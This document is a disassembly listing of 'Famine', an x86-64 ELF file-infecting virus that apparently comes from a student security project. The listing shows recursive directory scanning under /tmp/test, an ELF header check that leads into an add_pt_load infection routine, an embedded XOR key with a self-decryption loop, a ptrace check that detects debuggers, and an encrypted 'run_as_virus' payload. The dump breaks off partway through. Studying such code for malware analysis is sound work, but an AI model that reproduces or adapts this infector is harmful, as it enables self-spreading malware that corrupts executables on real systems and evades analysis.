
Famine1:     file format elf64-x86-64


Disassembly of section .text:

0000000000401000 <procdir>:
  401000:	2f                   	(bad)
  401001:	70 72                	jo     401075 <the_end+0x13>
  401003:	6f                   	outsl  %ds:(%rsi),(%dx)
  401004:	63 2f                	movsxd (%rdi),%ebp
	...

0000000000401007 <proc_status>:
  401007:	2f                   	(bad)
  401008:	73 74                	jae    40107e <the_end+0x1c>
  40100a:	61                   	(bad)
  40100b:	74 75                	je     401082 <the_end+0x20>
  40100d:	73 00                	jae    40100f <proc_test>

000000000040100f <proc_test>:
  40100f:	4e 61                	rex.WRX (bad)
  401011:	6d                   	insl   (%dx),%es:(%rdi)
  401012:	65 3a 09             	cmp    %gs:(%rcx),%cl
  401015:	74 65                	je     40107c <the_end+0x1a>
  401017:	73 74                	jae    40108d <the_end+0x2b>
  401019:	0a                   	.byte 0xa

000000000040101a <firstDir>:
  40101a:	2f                   	(bad)
  40101b:	74 6d                	je     40108a <the_end+0x28>
  40101d:	70 2f                	jo     40104e <signature+0x1f>
  40101f:	74 65                	je     401086 <the_end+0x24>
  401021:	73 74                	jae    401097 <print_string+0x2>
	...

0000000000401024 <secondDir>:
  401024:	2f                   	(bad)
  401025:	74 6d                	je     401094 <the_end+0x32>
  401027:	70 2f                	jo     401058 <signature+0x29>
  401029:	74 65                	je     401090 <the_end+0x2e>
  40102b:	73 74                	jae    4010a1 <print_string+0xc>
  40102d:	32 00                	xor    (%rax),%al

000000000040102f <signature>:
  40102f:	46 61                	rex.RX (bad)
  401031:	6d                   	insl   (%dx),%es:(%rdi)
  401032:	69 6e 65 20 76 65 72 	imul   $0x72657620,0x65(%rsi),%ebp
  401039:	73 69                	jae    4010a4 <print_string+0xf>
  40103b:	6f                   	outsl  %ds:(%rsi),(%dx)
  40103c:	6e                   	outsb  %ds:(%rsi),(%dx)
  40103d:	20 31                	and    %dh,(%rcx)
  40103f:	2e 30 20             	cs xor %ah,(%rax)
  401042:	28 63 29             	sub    %ah,0x29(%rbx)
  401045:	6f                   	outsl  %ds:(%rsi),(%dx)
  401046:	64 65 64 20 62 79    	fs gs and %ah,%fs:0x79(%rdx)
  40104c:	20 3c 6f             	and    %bh,(%rdi,%rbp,2)
  40104f:	63 72 6f             	movsxd 0x6f(%rdx),%esi
  401052:	73 73                	jae    4010c7 <str_copy.loop>
  401054:	69 3e 2d 3c 65 6c    	imul   $0x6c653c2d,(%rsi),%edi
  40105a:	61                   	(bad)
  40105b:	69 67 6e 65 6c 3e 00 	imul   $0x3e6c65,0x6e(%rdi),%esp

0000000000401062 <the_end>:
  401062:	54                   	push   %rsp
  401063:	68 69 73 20 69       	push   $0x69207369
  401068:	73 20                	jae    40108a <the_end+0x28>
  40106a:	74 68                	je     4010d4 <search_substring+0x5>
  40106c:	65 20 65 6e          	and    %ah,%gs:0x6e(%rbp)
  401070:	64 20 6d 79          	and    %ch,%fs:0x79(%rbp)
  401074:	20 66 72             	and    %ah,0x72(%rsi)
  401077:	69 65 6e 64 2c 20 6d 	imul   $0x6d202c64,0x6e(%rbp),%esp
  40107e:	79 20                	jns    4010a0 <print_string+0xb>
  401080:	6f                   	outsl  %ds:(%rsi),(%dx)
  401081:	6e                   	outsb  %ds:(%rsi),(%dx)
  401082:	6c                   	insb   (%dx),%es:(%rdi)
  401083:	79 20                	jns    4010a5 <print_string+0x10>
  401085:	66 72 69             	data16 jb 4010f1 <search_substring.search_loop+0x1>
  401088:	65 6e                	outsb  %gs:(%rsi),(%dx)
  40108a:	64 20 74 68 65       	and    %dh,%fs:0x65(%rax,%rbp,2)
  40108f:	20 65 6e             	and    %ah,0x6e(%rbp)
  401092:	64 0a 00             	or     %fs:(%rax),%al

0000000000401095 <print_string>:
  401095:	57                   	push   %rdi
  401096:	56                   	push   %rsi
  401097:	52                   	push   %rdx
  401098:	48 89 fe             	mov    %rdi,%rsi
  40109b:	e8 13 00 00 00       	call   4010b3 <str_len>
  4010a0:	48 89 c2             	mov    %rax,%rdx
  4010a3:	bf 01 00 00 00       	mov    $0x1,%edi
  4010a8:	b8 01 00 00 00       	mov    $0x1,%eax
  4010ad:	0f 05                	syscall
  4010af:	5a                   	pop    %rdx
  4010b0:	5e                   	pop    %rsi
  4010b1:	5f                   	pop    %rdi
  4010b2:	c3                   	ret

00000000004010b3 <str_len>:
  4010b3:	57                   	push   %rdi
  4010b4:	48 31 c0             	xor    %rax,%rax

00000000004010b7 <str_len.loop>:
  4010b7:	80 3f 00             	cmpb   $0x0,(%rdi)
  4010ba:	74 08                	je     4010c4 <str_len.done>
  4010bc:	48 ff c7             	inc    %rdi
  4010bf:	48 ff c0             	inc    %rax
  4010c2:	eb f3                	jmp    4010b7 <str_len.loop>

00000000004010c4 <str_len.done>:
  4010c4:	5f                   	pop    %rdi
  4010c5:	c3                   	ret

00000000004010c6 <str_copy>:
  4010c6:	57                   	push   %rdi

00000000004010c7 <str_copy.loop>:
  4010c7:	ac                   	lods   %ds:(%rsi),%al
  4010c8:	aa                   	stos   %al,%es:(%rdi)
  4010c9:	84 c0                	test   %al,%al
  4010cb:	75 fa                	jne    4010c7 <str_copy.loop>
  4010cd:	58                   	pop    %rax
  4010ce:	c3                   	ret

00000000004010cf <search_substring>:
  4010cf:	55                   	push   %rbp
  4010d0:	48 89 e5             	mov    %rsp,%rbp
  4010d3:	41 54                	push   %r12
  4010d5:	41 55                	push   %r13
  4010d7:	41 56                	push   %r14
  4010d9:	41 57                	push   %r15
  4010db:	53                   	push   %rbx
  4010dc:	49 89 fc             	mov    %rdi,%r12
  4010df:	49 89 f5             	mov    %rsi,%r13
  4010e2:	49 89 d6             	mov    %rdx,%r14
  4010e5:	49 89 cf             	mov    %rcx,%r15
  4010e8:	4d 39 ef             	cmp    %r13,%r15
  4010eb:	77 3e                	ja     40112b <search_substring.search_not_found>
  4010ed:	48 31 db             	xor    %rbx,%rbx

00000000004010f0 <search_substring.search_loop>:
  4010f0:	4c 89 e8             	mov    %r13,%rax
  4010f3:	48 29 d8             	sub    %rbx,%rax
  4010f6:	4c 39 f8             	cmp    %r15,%rax
  4010f9:	72 30                	jb     40112b <search_substring.search_not_found>
  4010fb:	49 8d 3c 1c          	lea    (%r12,%rbx,1),%rdi
  4010ff:	4c 89 f6             	mov    %r14,%rsi
  401102:	4c 89 f9             	mov    %r15,%rcx
  401105:	48 31 c0             	xor    %rax,%rax

0000000000401108 <search_substring.compare_loop>:
  401108:	4c 39 f8             	cmp    %r15,%rax
  40110b:	7d 17                	jge    401124 <search_substring.search_found>
  40110d:	44 8a 04 07          	mov    (%rdi,%rax,1),%r8b
  401111:	44 8a 0c 06          	mov    (%rsi,%rax,1),%r9b
  401115:	45 38 c8             	cmp    %r9b,%r8b
  401118:	75 05                	jne    40111f <search_substring.search_next>
  40111a:	48 ff c0             	inc    %rax
  40111d:	eb e9                	jmp    401108 <search_substring.compare_loop>

000000000040111f <search_substring.search_next>:
  40111f:	48 ff c3             	inc    %rbx
  401122:	eb cc                	jmp    4010f0 <search_substring.search_loop>

0000000000401124 <search_substring.search_found>:
  401124:	b8 01 00 00 00       	mov    $0x1,%eax
  401129:	eb 03                	jmp    40112e <search_substring.search_done>

000000000040112b <search_substring.search_not_found>:
  40112b:	48 31 c0             	xor    %rax,%rax

000000000040112e <search_substring.search_done>:
  40112e:	5b                   	pop    %rbx
  40112f:	41 5f                	pop    %r15
  401131:	41 5e                	pop    %r14
  401133:	41 5d                	pop    %r13
  401135:	41 5c                	pop    %r12
  401137:	48 89 ec             	mov    %rbp,%rsp
  40113a:	5d                   	pop    %rbp
  40113b:	c3                   	ret

000000000040113c <check_elf64_exec>:
  40113c:	55                   	push   %rbp
  40113d:	48 89 e5             	mov    %rsp,%rbp
  401140:	41 54                	push   %r12
  401142:	41 55                	push   %r13
  401144:	41 56                	push   %r14
  401146:	41 57                	push   %r15
  401148:	53                   	push   %rbx
  401149:	49 89 fc             	mov    %rdi,%r12
  40114c:	49 89 f5             	mov    %rsi,%r13
  40114f:	4d 31 f6             	xor    %r14,%r14

0000000000401152 <check_elf64_exec.check_loop>:
  401152:	4d 39 ee             	cmp    %r13,%r14
  401155:	0f 8d bf 00 00 00    	jge    40121a <check_elf64_exec.check_done>
  40115b:	4c 89 f0             	mov    %r14,%rax
  40115e:	48 69 c0 00 10 00 00 	imul   $0x1000,%rax,%rax
  401165:	4d 8d 3c 04          	lea    (%r12,%rax,1),%r15
  401169:	b8 01 01 00 00       	mov    $0x101,%eax
  40116e:	bf 9c ff ff ff       	mov    $0xffffff9c,%edi
  401173:	4c 89 fe             	mov    %r15,%rsi
  401176:	31 d2                	xor    %edx,%edx
  401178:	45 31 d2             	xor    %r10d,%r10d
  40117b:	0f 05                	syscall
  40117d:	48 85 c0             	test   %rax,%rax
  401180:	0f 88 84 00 00 00    	js     40120a <check_elf64_exec.invalid_file>
  401186:	48 89 c3             	mov    %rax,%rbx
  401189:	b8 00 00 00 00       	mov    $0x0,%eax
  40118e:	89 df                	mov    %ebx,%edi
  401190:	48 8d 35 f9 2e 10 00 	lea    0x102ef9(%rip),%rsi        # 504090 <elf_header_buf>
  401197:	ba 40 00 00 00       	mov    $0x40,%edx
  40119c:	0f 05                	syscall
  40119e:	48 83 f8 40          	cmp    $0x40,%rax
  4011a2:	7c 5d                	jl     401201 <check_elf64_exec.close_and_invalid>
  4011a4:	48 8d 3d e5 2e 10 00 	lea    0x102ee5(%rip),%rdi        # 504090 <elf_header_buf>
  4011ab:	80 3f 7f             	cmpb   $0x7f,(%rdi)
  4011ae:	75 51                	jne    401201 <check_elf64_exec.close_and_invalid>
  4011b0:	80 7f 01 45          	cmpb   $0x45,0x1(%rdi)
  4011b4:	75 4b                	jne    401201 <check_elf64_exec.close_and_invalid>
  4011b6:	80 7f 02 4c          	cmpb   $0x4c,0x2(%rdi)
  4011ba:	75 45                	jne    401201 <check_elf64_exec.close_and_invalid>
  4011bc:	80 7f 03 46          	cmpb   $0x46,0x3(%rdi)
  4011c0:	75 3f                	jne    401201 <check_elf64_exec.close_and_invalid>
  4011c2:	80 7f 04 02          	cmpb   $0x2,0x4(%rdi)
  4011c6:	75 39                	jne    401201 <check_elf64_exec.close_and_invalid>
  4011c8:	0f b7 47 10          	movzwl 0x10(%rdi),%eax
  4011cc:	66 83 f8 02          	cmp    $0x2,%ax
  4011d0:	74 08                	je     4011da <check_elf64_exec.valid_elf>
  4011d2:	66 83 f8 03          	cmp    $0x3,%ax
  4011d6:	74 02                	je     4011da <check_elf64_exec.valid_elf>
  4011d8:	eb 27                	jmp    401201 <check_elf64_exec.close_and_invalid>

00000000004011da <check_elf64_exec.valid_elf>:
  4011da:	b8 03 00 00 00       	mov    $0x3,%eax
  4011df:	89 df                	mov    %ebx,%edi
  4011e1:	0f 05                	syscall
  4011e3:	4c 89 ff             	mov    %r15,%rdi
  4011e6:	e8 aa fe ff ff       	call   401095 <print_string>
  4011eb:	48 8d 3d 0f 1e 00 00 	lea    0x1e0f(%rip),%rdi        # 403001 <msg_valid>
  4011f2:	e8 9e fe ff ff       	call   401095 <print_string>
  4011f7:	4c 89 ff             	mov    %r15,%rdi
  4011fa:	e8 5b 09 00 00       	call   401b5a <add_pt_load>
  4011ff:	eb 11                	jmp    401212 <check_elf64_exec.next_file>

0000000000401201 <check_elf64_exec.close_and_invalid>:
  401201:	b8 03 00 00 00       	mov    $0x3,%eax
  401206:	89 df                	mov    %ebx,%edi
  401208:	0f 05                	syscall

000000000040120a <check_elf64_exec.invalid_file>:
  40120a:	4c 89 ff             	mov    %r15,%rdi
  40120d:	e8 9c 0c 00 00       	call   401eae <process_non_elf_file>

0000000000401212 <check_elf64_exec.next_file>:
  401212:	49 ff c6             	inc    %r14
  401215:	e9 38 ff ff ff       	jmp    401152 <check_elf64_exec.check_loop>

000000000040121a <check_elf64_exec.check_done>:
  40121a:	5b                   	pop    %rbx
  40121b:	41 5f                	pop    %r15
  40121d:	41 5e                	pop    %r14
  40121f:	41 5d                	pop    %r13
  401221:	41 5c                	pop    %r12
  401223:	48 89 ec             	mov    %rbp,%rsp
  401226:	5d                   	pop    %rbp
  401227:	c3                   	ret

0000000000401228 <list_files_recursive>:
  401228:	55                   	push   %rbp
  401229:	48 89 e5             	mov    %rsp,%rbp
  40122c:	48 81 ec 80 10 00 00 	sub    $0x1080,%rsp
  401233:	48 83 e4 f0          	and    $0xfffffffffffffff0,%rsp
  401237:	4c 89 65 d8          	mov    %r12,-0x28(%rbp)
  40123b:	4c 89 6d d0          	mov    %r13,-0x30(%rbp)
  40123f:	4c 89 75 c8          	mov    %r14,-0x38(%rbp)
  401243:	4c 89 7d c0          	mov    %r15,-0x40(%rbp)
  401247:	48 89 5d b8          	mov    %rbx,-0x48(%rbp)
  40124b:	49 89 fc             	mov    %rdi,%r12
  40124e:	4c 89 e7             	mov    %r12,%rdi
  401251:	e8 5d fe ff ff       	call   4010b3 <str_len>
  401256:	48 89 45 f0          	mov    %rax,-0x10(%rbp)
  40125a:	b8 01 01 00 00       	mov    $0x101,%eax
  40125f:	bf 9c ff ff ff       	mov    $0xffffff9c,%edi
  401264:	4c 89 e6             	mov    %r12,%rsi
  401267:	ba 00 00 01 00       	mov    $0x10000,%edx
  40126c:	45 31 d2             	xor    %r10d,%r10d
  40126f:	0f 05                	syscall
  401271:	48 85 c0             	test   %rax,%rax
  401274:	0f 88 33 01 00 00    	js     4013ad <list_files_recursive.done>
  40127a:	48 89 45 f8          	mov    %rax,-0x8(%rbp)
  40127e:	49 89 c5             	mov    %rax,%r13

0000000000401281 <list_files_recursive.read_loop>:
  401281:	b8 d9 00 00 00       	mov    $0xd9,%eax
  401286:	44 89 ef             	mov    %r13d,%edi
  401289:	48 8d b5 80 ef ff ff 	lea    -0x1080(%rbp),%rsi
  401290:	ba 00 10 00 00       	mov    $0x1000,%edx
  401295:	0f 05                	syscall
  401297:	48 85 c0             	test   %rax,%rax
  40129a:	0f 8e 03 01 00 00    	jle    4013a3 <list_files_recursive.close_dir>
  4012a0:	48 89 45 e8          	mov    %rax,-0x18(%rbp)
  4012a4:	48 c7 45 e0 00 00 00 	movq   $0x0,-0x20(%rbp)
  4012ab:	00 
  4012ac:	49 89 c6             	mov    %rax,%r14

00000000004012af <list_files_recursive.process_entry>:
  4012af:	48 8b 45 e0          	mov    -0x20(%rbp),%rax
  4012b3:	4c 39 f0             	cmp    %r14,%rax
  4012b6:	7d c9                	jge    401281 <list_files_recursive.read_loop>
  4012b8:	4c 8d bd 80 ef ff ff 	lea    -0x1080(%rbp),%r15
  4012bf:	49 01 c7             	add    %rax,%r15
  4012c2:	41 0f b7 5f 10       	movzwl 0x10(%r15),%ebx
  4012c7:	41 0f b6 47 12       	movzbl 0x12(%r15),%eax
  4012cc:	49 8d 4f 13          	lea    0x13(%r15),%rcx
  4012d0:	80 39 2e             	cmpb   $0x2e,(%rcx)
  4012d3:	75 1a                	jne    4012ef <list_files_recursive.not_dot>
  4012d5:	80 79 01 00          	cmpb   $0x0,0x1(%rcx)
  4012d9:	0f 84 b4 00 00 00    	je     401393 <list_files_recursive.next_entry>
  4012df:	80 79 01 2e          	cmpb   $0x2e,0x1(%rcx)
  4012e3:	75 0a                	jne    4012ef <list_files_recursive.not_dot>
  4012e5:	80 79 02 00          	cmpb   $0x0,0x2(%rcx)
  4012e9:	0f 84 a4 00 00 00    	je     401393 <list_files_recursive.next_entry>

00000000004012ef <list_files_recursive.not_dot>:
  4012ef:	48 89 45 b0          	mov    %rax,-0x50(%rbp)
  4012f3:	48 89 5d a8          	mov    %rbx,-0x58(%rbp)
  4012f7:	4c 89 e7             	mov    %r12,%rdi
  4012fa:	48 8b 45 f0          	mov    -0x10(%rbp),%rax
  4012fe:	48 01 c7             	add    %rax,%rdi
  401301:	80 7f ff 2f          	cmpb   $0x2f,-0x1(%rdi)
  401305:	74 06                	je     40130d <list_files_recursive.no_slash>
  401307:	c6 07 2f             	movb   $0x2f,(%rdi)
  40130a:	48 ff c7             	inc    %rdi

000000000040130d <list_files_recursive.no_slash>:
  40130d:	48 89 ce             	mov    %rcx,%rsi
  401310:	e8 b1 fd ff ff       	call   4010c6 <str_copy>
  401315:	48 8b 45 b0          	mov    -0x50(%rbp),%rax
  401319:	3c 08                	cmp    $0x8,%al
  40131b:	75 5d                	jne    40137a <list_files_recursive.check_dir>
  40131d:	48 8b 05 64 2d 10 00 	mov    0x102d64(%rip),%rax        # 504088 <file_count>
  401324:	48 3d 00 01 00 00    	cmp    $0x100,%rax
  40132a:	7d 2a                	jge    401356 <list_files_recursive.skip_store>
  40132c:	48 69 c0 00 10 00 00 	imul   $0x1000,%rax,%rax
  401333:	48 8d 3d 4e 2d 00 00 	lea    0x2d4e(%rip),%rdi        # 404088 <file_list>
  40133a:	48 01 c7             	add    %rax,%rdi
  40133d:	4c 89 e6             	mov    %r12,%rsi
  401340:	e8 81 fd ff ff       	call   4010c6 <str_copy>
  401345:	48 8b 05 3c 2d 10 00 	mov    0x102d3c(%rip),%rax        # 504088 <file_count>
  40134c:	48 ff c0             	inc    %rax
  40134f:	48 89 05 32 2d 10 00 	mov    %rax,0x102d32(%rip)        # 504088 <file_count>

0000000000401356 <list_files_recursive.skip_store>:
  401356:	4c 89 e7             	mov    %r12,%rdi
  401359:	e8 37 fd ff ff       	call   401095 <print_string>
  40135e:	50                   	push   %rax
  40135f:	b8 01 00 00 00       	mov    $0x1,%eax
  401364:	bf 01 00 00 00       	mov    $0x1,%edi
  401369:	48 8d 35 90 1c 00 00 	lea    0x1c90(%rip),%rsi        # 403000 <newline>
  401370:	ba 01 00 00 00       	mov    $0x1,%edx
  401375:	0f 05                	syscall
  401377:	58                   	pop    %rax
  401378:	eb 0c                	jmp    401386 <list_files_recursive.restore_path>

000000000040137a <list_files_recursive.check_dir>:
  40137a:	3c 04                	cmp    $0x4,%al
  40137c:	75 08                	jne    401386 <list_files_recursive.restore_path>
  40137e:	4c 89 e7             	mov    %r12,%rdi
  401381:	e8 a2 fe ff ff       	call   401228 <list_files_recursive>

0000000000401386 <list_files_recursive.restore_path>:
  401386:	48 8b 45 f0          	mov    -0x10(%rbp),%rax
  40138a:	41 c6 04 04 00       	movb   $0x0,(%r12,%rax,1)
  40138f:	48 8b 5d a8          	mov    -0x58(%rbp),%rbx

0000000000401393 <list_files_recursive.next_entry>:
  401393:	48 8b 45 e0          	mov    -0x20(%rbp),%rax
  401397:	48 01 d8             	add    %rbx,%rax
  40139a:	48 89 45 e0          	mov    %rax,-0x20(%rbp)
  40139e:	e9 0c ff ff ff       	jmp    4012af <list_files_recursive.process_entry>

00000000004013a3 <list_files_recursive.close_dir>:
  4013a3:	b8 03 00 00 00       	mov    $0x3,%eax
  4013a8:	44 89 ef             	mov    %r13d,%edi
  4013ab:	0f 05                	syscall

00000000004013ad <list_files_recursive.done>:
  4013ad:	4c 8b 65 d8          	mov    -0x28(%rbp),%r12
  4013b1:	4c 8b 6d d0          	mov    -0x30(%rbp),%r13
  4013b5:	4c 8b 75 c8          	mov    -0x38(%rbp),%r14
  4013b9:	4c 8b 7d c0          	mov    -0x40(%rbp),%r15
  4013bd:	48 8b 5d b8          	mov    -0x48(%rbp),%rbx
  4013c1:	48 89 ec             	mov    %rbp,%rsp
  4013c4:	5d                   	pop    %rbp
  4013c5:	c3                   	ret

00000000004013c6 <original_entry_storage>:
	...

00000000004013ce <encryption_key>:
  4013ce:	46 6f                	rex.RX outsl %ds:(%rsi),(%dx)
  4013d0:	38 47 6b             	cmp    %al,0x6b(%rdi)
  4013d3:	37                   	(bad)
  4013d4:	57                   	push   %rdi
  4013d5:	53                   	push   %rbx
  4013d6:	6d                   	insl   (%dx),%es:(%rdi)
  4013d7:	31 36                	xor    %esi,(%rsi)
  4013d9:	6e                   	outsb  %ds:(%rsi),(%dx)
  4013da:	68                   	.byte 0x68
  4013db:	4d                   	rex.WRB
  4013dc:	43                   	rex.XB
  4013dd:	48                   	rex.W

00000000004013de <encrypted_flag>:
  4013de:	01                   	.byte 0x1

00000000004013df <_start>:
  4013df:	55                   	push   %rbp
  4013e0:	48 89 e5             	mov    %rsp,%rbp
  4013e3:	53                   	push   %rbx
  4013e4:	41 54                	push   %r12
  4013e6:	41 55                	push   %r13
  4013e8:	41 56                	push   %r14
  4013ea:	41 57                	push   %r15
  4013ec:	e8 00 00 00 00       	call   4013f1 <_start.get_decrypt_base>

00000000004013f1 <_start.get_decrypt_base>:
  4013f1:	41 5f                	pop    %r15
  4013f3:	49 83 ef 2b          	sub    $0x2b,%r15
  4013f7:	41 0f b6 47 18       	movzbl 0x18(%r15),%eax
  4013fc:	84 c0                	test   %al,%al
  4013fe:	74 1f                	je     40141f <_start.not_encrypted>
  401400:	49 8d bf 5d 01 00 00 	lea    0x15d(%r15),%rdi
  401407:	be 37 06 00 00       	mov    $0x637,%esi
  40140c:	49 8d 57 08          	lea    0x8(%r15),%rdx
  401410:	b9 10 00 00 00       	mov    $0x10,%ecx
  401415:	e8 ae 00 00 00       	call   4014c8 <decrypt_code>
  40141a:	41 c6 47 18 00       	movb   $0x0,0x18(%r15)

000000000040141f <_start.not_encrypted>:
  40141f:	e8 00 00 00 00       	call   401424 <_start.get_base_after_decrypt>

0000000000401424 <_start.get_base_after_decrypt>:
  401424:	41 5f                	pop    %r15
  401426:	49 83 ef 5e          	sub    $0x5e,%r15
  40142a:	b8 65 00 00 00       	mov    $0x65,%eax
  40142f:	bf 00 00 00 00       	mov    $0x0,%edi
  401434:	31 f6                	xor    %esi,%esi
  401436:	31 d2                	xor    %edx,%edx
  401438:	45 31 d2             	xor    %r10d,%r10d
  40143b:	0f 05                	syscall
  40143d:	48 83 f8 ff          	cmp    $0xffffffffffffffff,%rax
  401441:	74 64                	je     4014a7 <_start.being_debugged>
  401443:	e8 00 00 00 00       	call   401448 <_start.get_base>

0000000000401448 <_start.get_base>:
  401448:	41 5f                	pop    %r15
  40144a:	49 81 ef 82 00 00 00 	sub    $0x82,%r15
  401451:	49 8b 07             	mov    (%r15),%rax
  401454:	48 85 c0             	test   %rax,%rax
  401457:	0f 85 c6 00 00 00    	jne    401523 <_start.run_as_virus>
  40145d:	48 c7 05 20 2c 10 00 	movq   $0x0,0x102c20(%rip)        # 504088 <file_count>
  401464:	00 00 00 00 
  401468:	48 be 1a 10 40 00 00 	movabs $0x40101a,%rsi
  40146f:	00 00 00 
  401472:	48 8d 3d 0f 1c 00 00 	lea    0x1c0f(%rip),%rdi        # 403088 <__bss_start>
  401479:	e8 17 fc ff ff       	call   401095 <print_string>
  40147e:	e8 43 fc ff ff       	call   4010c6 <str_copy>
  401483:	48 8d 3d fe 1b 00 00 	lea    0x1bfe(%rip),%rdi        # 403088 <__bss_start>
  40148a:	e8 99 fd ff ff       	call   401228 <list_files_recursive>
  40148f:	48 8d 3d f2 2b 00 00 	lea    0x2bf2(%rip),%rdi        # 404088 <file_list>
  401496:	48 8b 35 eb 2b 10 00 	mov    0x102beb(%rip),%rsi        # 504088 <file_count>
  40149d:	e8 9a fc ff ff       	call   40113c <check_elf64_exec>
  4014a2:	e9 80 0b 00 00       	jmp    402027 <_end>

00000000004014a7 <_start.being_debugged>:
  4014a7:	b8 01 00 00 00       	mov    $0x1,%eax
  4014ac:	bf 01 00 00 00       	mov    $0x1,%edi
  4014b1:	48 8d 35 b2 1b 00 00 	lea    0x1bb2(%rip),%rsi        # 40306a <msg_debugging>
  4014b8:	ba 0c 00 00 00       	mov    $0xc,%edx
  4014bd:	0f 05                	syscall
  4014bf:	b8 3c 00 00 00       	mov    $0x3c,%eax
  4014c4:	31 ff                	xor    %edi,%edi
  4014c6:	0f 05                	syscall

00000000004014c8 <decrypt_code>:
  4014c8:	55                   	push   %rbp
  4014c9:	48 89 e5             	mov    %rsp,%rbp
  4014cc:	53                   	push   %rbx
  4014cd:	41 50                	push   %r8
  4014cf:	41 51                	push   %r9
  4014d1:	41 54                	push   %r12
  4014d3:	41 55                	push   %r13
  4014d5:	41 56                	push   %r14
  4014d7:	41 57                	push   %r15
  4014d9:	49 89 fc             	mov    %rdi,%r12
  4014dc:	49 89 f5             	mov    %rsi,%r13
  4014df:	49 89 d6             	mov    %rdx,%r14
  4014e2:	49 89 cf             	mov    %rcx,%r15
  4014e5:	48 31 db             	xor    %rbx,%rbx
  4014e8:	4d 31 c0             	xor    %r8,%r8

00000000004014eb <decrypt_code.decrypt_loop>:
  4014eb:	4c 39 eb             	cmp    %r13,%rbx
  4014ee:	7d 24                	jge    401514 <decrypt_code.decrypt_done>
  4014f0:	41 0f b6 04 1c       	movzbl (%r12,%rbx,1),%eax
  4014f5:	c0 c8 03             	ror    $0x3,%al
  4014f8:	47 0f b6 0c 06       	movzbl (%r14,%r8,1),%r9d
  4014fd:	44 30 c8             	xor    %r9b,%al
  401500:	41 88 04 1c          	mov    %al,(%r12,%rbx,1)
  401504:	48 ff c3             	inc    %rbx
  401507:	49 ff c0             	inc    %r8
  40150a:	4d 39 f8             	cmp    %r15,%r8
  40150d:	7c dc                	jl     4014eb <decrypt_code.decrypt_loop>
  40150f:	4d 31 c0             	xor    %r8,%r8
  401512:	eb d7                	jmp    4014eb <decrypt_code.decrypt_loop>

0000000000401514 <decrypt_code.decrypt_done>:
  401514:	41 5f                	pop    %r15
  401516:	41 5e                	pop    %r14
  401518:	41 5d                	pop    %r13
  40151a:	41 5c                	pop    %r12
  40151c:	41 59                	pop    %r9
  40151e:	41 58                	pop    %r8
  401520:	5b                   	pop    %rbx
  401521:	5d                   	pop    %rbp
  401522:	c3                   	ret

0000000000401523 <_start.run_as_virus>:
  401523:	75 7b                	jne    4015a0 <v_signature+0x7>
  401525:	c1 3a 5b             	sarl   $0x5b,(%rdx)

0000000000401528 <_start.run_as_virus.get_start_rip>:
  401528:	7b f8                	jnp    401522 <decrypt_code.decrypt_done+0xe>
  40152a:	f3 21 81 b1 73 09 72 	repz and %eax,0x720973b1(%rcx)
  401531:	22 c0                	and    %al,%al
  401533:	70 77                	jo     4015ac <v_signature+0x13>
  401535:	a6                   	cmpsb  %es:(%rdi),%ds:(%rsi)
  401536:	3a 59 b9             	cmp    -0x47(%rcx),%bl
  401539:	ba d8 77 ae 36       	mov    $0x36ae77d8,%edx
  40153e:	31 7d 4a             	xor    %edi,0x4a(%rbp)
  401541:	3b 42 32             	cmp    0x32(%rdx),%eax
  401544:	7b c1                	jnp    401507 <decrypt_code.decrypt_loop+0x1c>
  401546:	78 37                	js     40157f <_start.run_as_virus.get_start_rip+0x57>
  401548:	5a                   	pop    %rdx
  401549:	9b da 21             	fisubl (%rcx)
  40154c:	e5 0c                	in     $0xc,%eax
  40154e:	3d 4b 6a 1a 05       	cmp    $0x51a6a4b,%eax
  401553:	99                   	cltd
  401554:	7b c1                	jnp    401517 <decrypt_code.decrypt_done+0x3>
  401556:	3a 19                	cmp    (%rcx),%bl
  401558:	d5 59 bb 2b cb dd d2 	{rex2 0x59} movabs $0xe6762862d2ddcb2b,%r27
  40155f:	62 28 76 e6 
  401563:	13 3b                	adc    (%rbx),%edi
  401565:	41 3a 5b fe          	cmp    -0x2(%r11),%bl
  401569:	b5 9a                	mov    $0x9a,%ch
  40156b:	6b 89 f3 3f 24 28 46 	imul   $0x46,0x28243ff3(%rcx),%ecx
  401572:	68 b4 91 83 b3       	push   $0xffffffffb38391b4
  401577:	a4                   	movsb  %ds:(%rsi),%es:(%rdi)
  401578:	fb                   	sti
  401579:	33 2d 29 00 27 31    	xor    0x31270029(%rip),%ebp        # 316715a8 <_end+0x311676d8>
  40157f:	ca 24 70             	lret   $0x7024
  401582:	cb                   	lret
  401583:	34 11                	xor    $0x11,%al
  401585:	48 74 31             	rex.W je 4015b9 <v_signature+0x20>
  401588:	30 2c f0             	xor    %ch,(%rax,%rsi,8)
  40158b:	e2 57                	loop   4015e4 <virus_str_len.v_str_len_loop+0xb>
  40158d:	4e                   	rex.WRX
  40158e:	74                   	.byte 0x74

000000000040158f <v_firstDir>:
  40158f:	3a c9                	cmp    %cl,%cl
  401591:	71 c1                	jno    401554 <_start.run_as_virus.get_start_rip+0x2c>
  401593:	4b d8 ea             	rex.WXB fsubr %st(2),%st
  401596:	a1                   	.byte 0xa1
  401597:	f8                   	clc
  401598:	b9                   	.byte 0xb9

0000000000401599 <v_signature>:
  401599:	88 91 00 c2 c2 58    	mov    %dl,0x58c2c200(%rcx)
  40159f:	42 d9 31             	rex.X fnstenv (%rcx)
  4015a2:	d1 a9 30 ba 49 5a    	shrl   $1,0x5a49ba30(%rcx)
  4015a8:	30 cb                	xor    %cl,%bl
  4015aa:	1b 6a c8             	sbb    -0x38(%rdx),%ebp
  4015ad:	aa                   	stos   %al,%es:(%rdi)
  4015ae:	3a 38                	cmp    (%rax),%bh
  4015b0:	49 31 61 33          	xor    %rsp,0x33(%r9)
  4015b4:	68 0a 3b ba c2       	push   $0xffffffffc2ba3b0a
  4015b9:	a1 09 10 12 2a 38 b2 	movabs 0xfb03b2382a121009,%eax
  4015c0:	03 fb 
  4015c2:	69 51 70 8a 01 28 92 	imul   $0x9228018a,0x70(%rcx),%edx
  4015c9:	d9 6b 6b             	fldcw  0x6b(%rbx)

00000000004015cc <virus_str_copy>:
  4015cc:	0b                   	.byte 0xb

00000000004015cd <virus_str_copy.v_str_copy_loop>:
  4015cd:	d4                   	(bad)
  4015ce:	26 67 6c             	es insb (%dx),%es:(%edi)
  4015d1:	b1 95                	mov    $0x95,%cl
  4015d3:	f0                   	lock
  4015d4:	65                   	gs

00000000004015d5 <virus_str_len>:
  4015d5:	7b 78                	jnp    40164f <virus_list_and_infect+0x1>
  4015d7:	d2                   	.byte 0xd2
  4015d8:	bf                   	.byte 0xbf

00000000004015d9 <virus_str_len.v_str_len_loop>:
